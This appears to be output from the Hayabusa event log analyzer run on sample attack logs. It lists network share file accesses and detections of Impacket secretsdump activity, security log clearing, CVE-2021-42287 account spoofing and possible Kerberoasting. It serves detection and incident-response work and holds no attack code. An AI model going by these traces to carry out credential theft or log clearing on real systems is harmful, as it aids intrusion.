0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.895 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.911 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.911 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.911 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.942 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.942 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.957 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.957 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.957 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.973 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.973 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.973 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.989 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.989 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:30.989 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.004 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.004 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.004 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.004 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.020 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.020 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.020 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.036 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.036 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.036 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.051 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.051 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.051 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.051 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.067 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.067 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.067 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.084 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.086 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.086 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.086 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.105 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.123 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.139 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.139 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.139 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.139 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.154 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:31.154 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 12:01:18.896 
+00:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\drivers\etc\hosts | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 2592 | PGUID: A57649D1-E44F-61B5-D88F-850800000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1565-Data manipulation/ID11-DNS hosts files modified.evtx +2021-12-12 17:57:17.006 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.272 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: lgrove | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.277 +00:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: lgrove@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.278 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: - | IP Addr: 172.16.66.19 | LID: 0x738ae4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.325 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 
lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738afd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.372 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.375 +00:00,01566s-win16-ir.threebeesco.com,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.473 +00:00,01566s-win16-ir.threebeesco.com,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.473 +00:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: 01566s-win16-ir | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.497 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 
